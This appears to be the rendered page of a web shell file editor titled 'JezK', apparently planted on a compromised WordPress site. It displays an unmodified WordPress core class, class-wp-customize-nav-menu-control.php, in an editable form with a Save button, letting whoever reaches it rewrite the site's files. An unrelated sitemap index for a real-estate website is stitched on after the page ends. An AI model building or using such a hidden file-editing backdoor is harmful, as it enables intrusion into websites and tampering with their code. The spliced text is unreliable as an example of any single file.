
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: class-wp-customize-nav-menu-control.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Customize API: WP_Customize_Nav_Menu_Control class
 *
 * @package WordPress
 * @subpackage Customize
 * @since 4.4.0
 */

/**
 * Customize Nav Menu Control Class.
 *
 * @since 4.3.0
 *
 * @see WP_Customize_Control
 */
class WP_Customize_Nav_Menu_Control extends WP_Customize_Control {

	/**
	 * Control type.
	 *
	 * @since 4.3.0
	 * @var string
	 */
	public $type = &#039;nav_menu&#039;;

	/**
	 * Don&#039;t render the control&#039;s content - it uses a JS template instead.
	 *
	 * @since 4.3.0
	 */
	public function render_content() {}

	/**
	 * JS/Underscore template for the control UI.
	 *
	 * @since 4.3.0
	 */
	public function content_template() {
		$add_items = __( &#039;Add Items&#039; );
		?&gt;
		&lt;p class=&quot;new-menu-item-invitation&quot;&gt;
			&lt;?php
			printf(
				/* translators: %s: &quot;Add Items&quot; button text. */
				__( &#039;Time to add some links! Click &amp;#8220;%s&amp;#8221; to start putting pages, categories, and custom links in your menu. Add as many things as you would like.&#039; ),
				$add_items
			);
			?&gt;
		&lt;/p&gt;
		&lt;div class=&quot;customize-control-nav_menu-buttons&quot;&gt;
			&lt;button type=&quot;button&quot; class=&quot;button add-new-menu-item&quot; aria-label=&quot;&lt;?php esc_attr_e( &#039;Add or remove menu items&#039; ); ?&gt;&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;available-menu-items&quot;&gt;
				&lt;?php echo $add_items; ?&gt;
			&lt;/button&gt;
			&lt;button type=&quot;button&quot; class=&quot;button-link reorder-toggle&quot; aria-label=&quot;&lt;?php esc_attr_e( &#039;Reorder menu items&#039; ); ?&gt;&quot; aria-describedby=&quot;reorder-items-desc-{{ data.menu_id }}&quot;&gt;
				&lt;span class=&quot;reorder&quot;&gt;&lt;?php _e( &#039;Reorder&#039; ); ?&gt;&lt;/span&gt;
				&lt;span class=&quot;reorder-done&quot;&gt;&lt;?php _e( &#039;Done&#039; ); ?&gt;&lt;/span&gt;
			&lt;/button&gt;
		&lt;/div&gt;
		&lt;p class=&quot;screen-reader-text&quot; id=&quot;reorder-items-desc-{{ data.menu_id }}&quot;&gt;
			&lt;?php
			/* translators: Hidden accessibility text. */
			_e( &#039;When in reorder mode, additional controls to reorder menu items will be available in the items list above.&#039; );
			?&gt;
		&lt;/p&gt;
		&lt;?php
	}

	/**
	 * Return parameters for this control.
	 *
	 * @since 4.3.0
	 *
	 * @return array Exported parameters.
	 */
	public function json() {
		$exported            = parent::json();
		$exported[&#039;menu_id&#039;] = $this-&gt;setting-&gt;term_id;

		return $exported;
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://www.mijikendarealestate.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-property-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-agent-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-posts-ube_content-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-type-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-status-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-feature-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-label-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-state-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-city-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-property-neighborhood-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-taxonomies-agency-1.xml</loc></sitemap><sitemap><loc>https://www.mijikendarealestate.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
